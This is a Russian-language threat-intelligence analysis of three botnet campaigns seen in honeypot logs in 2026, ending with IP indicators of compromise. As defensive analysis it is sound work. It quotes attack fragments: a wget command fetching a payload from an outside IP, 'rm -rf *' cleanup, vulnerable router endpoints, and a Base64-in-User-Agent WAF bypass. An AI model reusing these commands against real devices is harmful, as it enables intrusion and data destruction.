Наблюдение за логами публичных honeypot (имитаторов уязвимых систем) позволяет выявить скрытую структуру массовых автоматизированных атак. За период с мая по июнь 2026 года на одном из таких датчиков были зафиксированы три различных кампании, различающихся по зрелости инженерных решений, целям и тактике. Анализ показал, что фоновый шум сканирований неоднороден: под ним скрываются как грубые скрипты с ошибками форматирования, так и продуманные системы с файловыми нагрузками, ориентированные на корпоративные и AI-фреймворки.
Описание
Первая кампания - Terrabot. Этот ботнет, наследник кода Mirai и Gafgyt, был замечен 24 раза за 12 дней, каждый раз с нового IP-адреса. Все запросы несли одинаковый идентификатор User-Agent: terrabot-owned-you. Основные цели - уязвимости в маршрутизаторах D-Link (CVE-2016-20017) и GPON-оборудовании Dasan (CVE-2018-10561). Однако почти все попытки эксплуатации оказались неработоспособными. Например, запросы к эндпоинту /GponForm/diag_Form?images/ были корректны по URL, но тело POST оставалось пустым - то есть полезная нагрузка не передавалась. Финальное событие 9 июня содержало попытку эксплуатации бэкдора в CCTV-видеорегистраторах MVPower (CVE-2016-20016). Команда wget+140.233.190.47/jaws содержала неэкранированный пробел, что привело к ошибке 400 Bad Request. Разработчики скопировали шаблон, но не применили URL-кодирование. После этой неудачи Terrabot исчез из логов.
Вторая кампания - r00ts3c - демонстрирует более продуманную, но всё ещё не лишённую ошибок архитектуру. С 6 по 18 июня было зарегистрировано несколько волн запросов с идентификатором r00ts3c-owned-you. Ботнет нацелен на роутеры Linksys (уязвимость CVE-2025-34037, эндпоинт /tmUnblock.cgi) и на интерфейсы управления устройствами через SOAP-эндпоинты /UD/?9 и /UD/act?1. Полезная нагрузка подбирается под архитектуру процессора: например, файл kaizen.arm для ARM и kaizen.mpsl для MIPS с передачей аргумента "linksys". Однако в заголовках HTTP Host обнаружены грубые ошибки. В нескольких запросах поле Host содержало IP-адрес облачного сервера DigitalOcean (188.166.41.194) или 127.0.0.1 вместо реального адреса honeypot. Это указывает на то, что скрипты создавались в локальной среде и не были настроены перед развёртыванием. 17 июня активность сместилась на новый сервер (83.142.209.46), что демонстрирует попытку децентрализации. Последние запросы исходили из одной точки в Украине, подтверждая, что ботнет может адаптироваться.
Третья кампания - RondoDox (оператор rondo) - представляет наиболее продвинутый уровень. Она началась ещё 2 мая, за месяц до появления r00ts3c. Первая фаза включала атаки на корпоративные веб-серверы и AI-фреймворки. Использовалась техника обхода WAF через переменные окружения в User-Agent: в строку вкладывалась Base64-кодированная команда для бесфайловой загрузки. Эксплуатировались уязвимости Log4Shell (CVE-2021-44228) и ShadowRay (CVE-2023-48022). Вторая фаза, начавшаяся 16 мая, переключилась на потребительские роутеры: LB-LINK (CVE-2023-26801) и ASUS AsusWRT (CVE-2018-6000). При этом сменился сервер управления - с 45.92.1.50 на 204.10.194.134. Третья фаза, с 28 мая, показала физические ограничения инфраструктуры: исходный IP сместился на один адрес в том же пуле (124.198.131.22), что типично для DHCP-обновления в жилом секторе. Время активности строго совпадало с дневными часами Новой Зеландии (NZST, UTC+12), а по ночам запросы отсутствовали. Это указывает на то, что устройство в Окленде - не управляемый сервер, а скомпрометированный домашний роутер, вовлечённый в сканирование. Согласно логам honeypot, интервал между запросами составлял от двух до шести часов, что отражает реальный график использования сети жильцами.
Примечательно, что даже в рамках одного семейства (r00ts3c) наблюдалась эволюция: в первых запросах выполнялась полная очистка временных файлов (rm -rf *), а в более поздних - только удаление собственного бинарника (rm -rf kaizen.mpsl), что снижает шум и позволяет избежать конкуренции с другими вредоносными программами. Это свидетельствует о том, что авторы ботнета анализируют обратную связь и постепенно улучшают код.
Масштабы рынка автоматизированных атак подтверждаются массовостью эксплуатации старых уязвимостей. Несмотря на то, что CVE-2016-20017 и CVE-2016-20016 были опубликованы почти десять лет назад, они продолжают использоваться. Это происходит потому, что скорость автоматизированного сканирования значительно превышает темпы обновления устройств. Даже примитивные ботнеты с ошибками в скриптах могут нанести ущерб, если они действуют достаточно долго и охватывают широкий диапазон целей.
Три описанные кампании показывают, что за монотонным шумом сканирования скрывается многослойная экосистема. На нижнем уровне работают ботнеты-однодневки с низким качеством исполнения. На среднем - более структурированные, но с инженерными промахами. На верхнем - операторы, способные переключаться между корпоративными и потребительскими целями, использовать файловые методы доставки и использовать скомпрометированные бытовые устройства в качестве сканеров. Защитникам сетей необходимо не игнорировать "статический шум", а анализировать его паттерны: смена серверов управления, однотипные User-Agent, ошибки HTTP Host, скачки времени активности. Только так можно выявить скрытые кампании и своевременно принять меры до того, как примитивный скрипт, пройдя через десятки неудач, всё же найдёт уязвимую цель.
Индикаторы компрометации
IPv4
- 119.96.223.148
- 124.198.131.185
- 124.198.131.22
- 176.65.149.168
- 188.166.41.194
- 20.210.107.25
- 204.10.194.134
- 45.92.1.50
IPv4 Port Combination
- 188.166.41.194:80